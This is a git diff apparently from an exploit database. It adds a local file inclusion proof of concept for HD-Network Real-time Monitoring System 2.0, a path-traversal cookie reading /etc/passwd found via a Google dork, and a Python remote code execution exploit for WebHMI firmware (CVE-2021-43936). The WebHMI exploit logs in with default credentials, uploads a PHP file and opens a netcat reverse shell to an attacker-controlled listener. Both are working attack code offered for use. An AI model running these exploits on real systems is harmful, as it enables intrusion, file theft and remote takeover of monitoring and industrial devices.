diff --git a/exploits/linux/remote/50588.txt b/exploits/linux/remote/50588.txt new file mode 100644 index 000000000..76c2c5fe1 --- /dev/null +++ b/exploits/linux/remote/50588.txt @@ -0,0 +1,18 @@ +# Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI) +# Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0" +# Date: 11/12/2021 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: N/A +# Version: V2.0 +# Tested on: Nginx NVRDVRIPC Web Server + +Proof of Concept: + +GET /language/lang HTTP/1.1 +Referer: http://example.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 +Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype= +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip,deflate,br +Host: VulnIP +Connection: Keep-alive \ No newline at end of file diff --git a/exploits/php/webapps/50589.py b/exploits/php/webapps/50589.py new file mode 100755 index 000000000..b6c824a0b --- /dev/null +++ b/exploits/php/webapps/50589.py @@ -0,0 +1,110 @@ +# Exploit Title: WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 12/12/2021 +# Exploit Author: Jeremiasz Pluta +# Vendor Homepage: https://webhmi.com.ua/en/ +# Version: WebHMI Firmware < 4.1 +# CVE: CVE-2021-43936 +# Tested on: WebHMI Firmware 4.0.7475 + +#!/usr/bin/python +import sys +import re +import argparse +import pyfiglet +import requests +import time +import subprocess + +banner = pyfiglet.figlet_format("CVE-2021-43936") +print(banner) +print('Exploit for CVE-2021-43936') +print('For: WebHMI Firmware < 4.1') + +login = "admin" #CHANGE ME IF NEEDED +password = "admin" #CHANGE ME IF NEEDED + +class Exploit: + + def __init__(self, target_ip, target_port, localhost, localport): + self.target_ip = target_ip + self.target_port = target_port + self.localhost = localhost + self.localport = localport + + def exploitation(self): + payload = """""" + payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" + + headers_login = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', + 'Accept': 'application/json, text/javascript, */*; q=0.01', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'X-WH-LOGIN': login, + 'X-WH-PASSWORD': password, + 'X-Requested-With': 'XMLHttpRequest', + 'Connection': 'close', + 'Content-Length': '0' + } + + url = 'http://' + target_ip + ':' + target_port + r = requests.Session() + + print('[*] Resolving URL...') + r1 = r.get(url) + time.sleep(3) + + print('[*] Trying to log in...') + r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True) + time.sleep(3) + + print('[*] Login redirection...') + login_cookies = { + 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'], + 'X-WH-CHECK-TRIAL':'true', + 'il18next':'en', + } + r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies) + time.sleep(3) + + print('[*] Uploading cmd.php file...') + files = { + 'file': ('cmd.php', payload, 'application/x-php') + } + r4 = r.post(url + '/files.php', files=files, cookies=login_cookies) + time.sleep(3) + + print('[*] Setting up netcat listener...') + listener = subprocess.Popen(["nc", "-nvlp", self.localport]) + time.sleep(3) + + print('[*] Executing reverse shell...') + print('[*] Watchout for shell! :)') + r5 = r.get(url + '/uploads/files/cmd.php?cmd=' + payload2, cookies=login_cookies) + + if (r5.status_code == 200): + print('[*] Got shell!') + while True: + listener.wait() + else: + print('[-] Something went wrong!') + listener.terminate() + +def get_args(): + parser = argparse.ArgumentParser(description='WebHMI Firmware <4.1 Unrestricted File Upload + Code Execution (Authenticated)') + parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') + parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') + parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') + parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') + args = parser.parse_args() + return args + +args = get_args() +target_ip = args.url +target_port = args.target_port +localhost = args.localhost +localport = args.localport + +exp = Exploit(target_ip, target_port, localhost, localport) +exp.exploitation() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 825c527b8..0d1f69f27 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18578,6 +18578,7 @@ id,file,description,date,author,type,platform,port 50568,exploits/hardware/remote/50568.txt,"Auerswald COMpact 8.0B - Arbitrary File Disclosure",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware, 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware, 50576,exploits/linux/remote/50576.py,"Raspberry Pi 5.10 - Default Credentials",1970-01-01,netspooky,remote,linux, +50588,exploits/linux/remote/50588.txt,"HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)",1970-01-01,"Momen Eldawakhly",remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44672,3 +44673,4 @@ id,file,description,date,author,type,platform,port 50585,exploits/php/webapps/50585.sh,"OpenCATS 0.9.4 - Remote Code Execution (RCE)",1970-01-01,"Nicholas Ferreira",webapps,php, 50586,exploits/php/webapps/50586.txt,"Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,fuzzyap1,webapps,php, 50587,exploits/php/webapps/50587.txt,"Free School Management Software 1.0 - Remote Code Execution (RCE)",1970-01-01,fuzzyap1,webapps,php, +50589,exploits/php/webapps/50589.py,"WebHMI 4.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php,